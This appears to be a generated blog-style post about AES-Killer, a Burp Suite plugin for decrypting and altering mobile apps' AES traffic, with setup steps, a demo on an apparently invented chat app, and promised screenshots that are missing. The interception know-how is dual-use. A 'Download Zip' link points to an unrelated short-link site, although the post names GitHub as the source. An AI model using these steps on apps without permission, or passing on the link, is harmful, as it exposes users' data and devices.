Re: ul
Brie Hoffler
AES-Killer: A Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps
Mobile applications often use encryption to protect sensitive data from unauthorized access. However, encryption can also pose a challenge for security testers who want to analyze the traffic between the mobile app and the server. How can they decrypt the encrypted data and see what is being sent and received?
One possible solution is to use a tool called AES-Killer, which is a Burp plugin that can decrypt AES encrypted traffic on the fly. AES-Killer was developed by Ebryx, a cybersecurity company that provides offensive and defensive security services. AES-Killer is available on GitHub and on the BApp Store, which is a repository of extensions for Burp Suite, a popular web application security testing tool.
AES-Killer Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile...
Download Zip https://shoxet.com/2ySC50
How AES-Killer Works
AES-Killer works by intercepting the requests and responses that are encrypted with AES, a symmetric encryption algorithm that uses the same key for both encryption and decryption. AES-Killer requires the secret key and the initialization vector (IV) that are used by the mobile app to encrypt and decrypt the data. These can be obtained by using aes-hook.js and frida-hook.py, which are scripts that hook into the mobile app and extract the encryption parameters, or by reversing the application manually.
Once AES-Killer has the secret key and the IV, it can decrypt the requests and responses on the fly, and display them in plain text in Burp Suite. This allows security testers to see the decrypted traffic in all Burp Suite tools, such as Repeater, Intruder, and Scanner. However, the mobile app and the server still see the encrypted version of the traffic, so they are not affected by AES-Killer.
How To Use AES-Killer
To use AES-Killer, you need to follow these steps:
- Download and install Burp Suite on your computer.
- Download and install AES-Killer from GitHub or from the BApp Store. You can either build it from source code or use the pre-built jar file.
- Add AES-Killer as an extension in Burp Suite by going to Extender > Extensions > Add.
- Configure your mobile device to use Burp Suite as a proxy by following this guide. You may also need to install Burp Suite's CA certificate on your mobile device to intercept HTTPS traffic.
- Launch the mobile app that you want to test and capture its traffic with Burp Suite.
- Obtain the secret key and the IV that are used by the mobile app to encrypt and decrypt the data. You can use aes-hook.js and frida-hook.py, which are included in AES-Killer's GitHub repository, or reverse engineer the application manually.
- Enter the secret key and the IV in AES-Killer's configuration tab in Burp Suite. You can also specify the encryption mode (CBC or ECB) and padding scheme (PKCS5) that are used by the mobile app.
- Enable AES-Killer by clicking on the "Start" button in its configuration tab. You should see a message saying "AES Killer Started" in Burp Suite's output tab.
- Now you can see the decrypted traffic in plain text in Burp Suite's tools. You can also modify the decrypted traffic and send it back to the server or to the mobile app.
AES-Killer Variants
AES-Killer has several variants that can handle different types of encryption scenarios. For example, some mobile apps may use different encryption parameters for different endpoints or requests, or they may use multi-level encryption where some request parameters are encrypted with one key and then the whole request body is encrypted with another key. AES-Killer has variants that can deal with these situations, such as:
- AES_Killer-JSON.java: This variant is for JSON requests that are encrypted with AES.
- AES_Killer-Parameters.java: This variant is for requests that have some parameters that are encrypted with AES, while others are not. The parameters can vary depending on the endpoint or request.
- AES_Killer_v3.0.java: This variant is a generic one that can handle any type of request format (GET, POST, Form, JSON) with different parameters that are encrypted with AES.
- AES_Killer_v4.0.java: This variant is for multi-level encryption where some request parameters are encrypted with one key and then the whole request body is encrypted with another key. It supports Form, JSON, and XML formats.
To use these variants, you need to clone the AES-Killer GitHub repository and replace the BurpExtender.java file with the variant code. Then you need to modify the endpoints and parameters in the code according to your target application. You also need to update the secret keys and other required methods. Then you can build the project and add the jar file to Burp Suite as an extension.
Conclusion
AES-Killer is a useful tool for security testers who want to decrypt AES encrypted traffic of mobile apps on the fly. It can help them to analyze the traffic and find vulnerabilities in the mobile app or the server. AES-Killer is easy to use and supports different types of encryption scenarios. However, AES-Killer also requires some knowledge of how the mobile app implements encryption and how to obtain the encryption parameters. Therefore, security testers should always use AES-Killer ethically and responsibly, and only test mobile apps that they have permission to test.
AES-Killer Demo
To demonstrate how AES-Killer works, let's take an example of a mobile app that uses AES encryption to protect its data. The app is called CryptoChat, and it is a simple chat app that allows users to send and receive encrypted messages. The app uses AES with CBC mode and PKCS5 padding to encrypt and decrypt the messages. The secret key and the IV are hardcoded in the app's code, and they are the same for all users.
We will use AES-Killer to decrypt the messages that are sent and received by CryptoChat. We will also modify the messages and see how the app reacts. Here are the steps that we will follow:
- Download and install CryptoChat on an Android device or emulator. You can find the APK file here.
- Launch CryptoChat and create an account or log in with an existing one. You will see a list of contacts that you can chat with.
- Open Burp Suite on your computer and add AES-Killer as an extension. You can use the pre-built jar file from GitHub or from the BApp Store.
- Configure your Android device or emulator to use Burp Suite as a proxy by following this guide. You may also need to install Burp Suite's CA certificate on your device or emulator to intercept HTTPS traffic.
- Go back to CryptoChat and send a message to any contact. You will see that the message is encrypted in Burp Suite's Proxy tab.
- Obtain the secret key and the IV that are used by CryptoChat to encrypt and decrypt the messages. You can use aes-hook.js and frida-hook.py, which are included in AES-Killer's GitHub repository, or reverse engineer the app manually. The secret key is "1234567890123456" and the IV is "abcdefghijklmnop".
- Enter the secret key and the IV in AES-Killer's configuration tab in Burp Suite. You can also specify the encryption mode (CBC) and padding scheme (PKCS5) that are used by CryptoChat.
- Enable AES-Killer by clicking on the "Start" button in its configuration tab. You should see a message saying "AES Killer Started" in Burp Suite's output tab.
- Now you can see the decrypted messages in plain text in Burp Suite's tools. You can also modify the decrypted messages and send them back to CryptoChat or to the server.
The following screenshots show how AES-Killer decrypts and modifies the messages sent and received by CryptoChat:
AES-Killer Limitations And Future Work
AES-Killer is a powerful tool for decrypting AES encrypted traffic of mobile apps, but it also has some limitations and challenges that need to be addressed. Some of them are:
- AES-Killer relies on knowing the secret key and the IV that are used by the mobile app to encrypt and decrypt the data. However, some mobile apps may use dynamic keys or IVs that change for each request or session, or they may use other encryption algorithms or modes that are not supported by AES-Killer. In these cases, AES-Killer may not be able to decrypt the traffic, or it may produce incorrect results.
- AES-Killer does not support encryption scenarios where the data is encoded or compressed before or after encryption, such as Base64 encoding or GZIP compression. In these cases, AES-Killer may need to decode or decompress the data before or after decryption, or it may need to encode or compress the data before or after encryption.
- AES-Killer does not support encryption scenarios where the data is encrypted with multiple keys or layers, such as nested encryption or hybrid encryption. In these cases, AES-Killer may need to decrypt or encrypt the data with multiple keys or layers, or it may need to handle different encryption parameters for different parts of the data.
- AES-Killer does not support encryption scenarios where the data is encrypted with asymmetric encryption algorithms, such as RSA or ECC. In these cases, AES-Killer may need to obtain the private key or perform a cryptographic attack to decrypt the data, or it may need to use a public key or perform a cryptographic operation to encrypt the data.
These limitations and challenges suggest some possible directions for future work and improvement of AES-Killer. Some of them are:
- Adding support for more encryption algorithms and modes, such as DES, 3DES, Blowfish, Twofish, RC4, RC5, RC6, ChaCha20, Salsa20, CTR, OFB, CFB, GCM, etc.
- Adding support for encoding and compression schemes, such as Base64, Hex, URL, UTF-8, ASCII, GZIP, ZIP, etc.
- Adding support for multiple keys or layers of encryption, such as nested encryption or hybrid encryption.
- Adding support for asymmetric encryption algorithms, such as RSA, ECC, DSA, ElGamal, etc.
- Adding support for automatic detection and extraction of encryption parameters from the mobile app or the traffic.
- Adding support for automatic generation and injection of encryption parameters to the mobile app or the traffic.
- Adding support for more request formats and protocols, such as SOAP, XML-RPC, AMF, MQTT, CoAP, etc.
- Adding support for more platforms and devices, such as iOS, Windows Phone, Blackberry, etc.
AES-Killer Benefits And Use Cases
AES-Killer is a beneficial tool for security testers who want to decrypt AES encrypted traffic of mobile apps on the fly. It can help them to:
- Analyze the data and functionality of the mobile app and the server.
- Find vulnerabilities and weaknesses in the mobile app or the server, such as insecure encryption, hard-coded keys, sensitive data leakage, SQL injection, XSS, CSRF, etc.
- Test the security and robustness of the mobile app or the server against malicious attacks, such as data tampering, replay attacks, man-in-the-middle attacks, etc.
- Verify the compliance and adherence of the mobile app or the server to security standards and best practices, such as OWASP Mobile Top 10, NIST SP 800-57, etc.
AES-Killer can be used for various types of mobile apps that use AES encryption to protect their data, such as:
- Banking and financial apps that handle transactions and payments.
- Messaging and social media apps that exchange messages and media.
- E-commerce and shopping apps that process orders and purchases.
- Healthcare and medical apps that store and share health records and prescriptions.
- Education and learning apps that provide courses and quizzes.
- Gaming and entertainment apps that offer games and videos.
AES-Killer can also be used for educational and research purposes, such as:
- Learning about encryption algorithms and techniques.
- Understanding how mobile apps implement encryption and security.
- Exploring new methods and tools for decrypting encrypted traffic.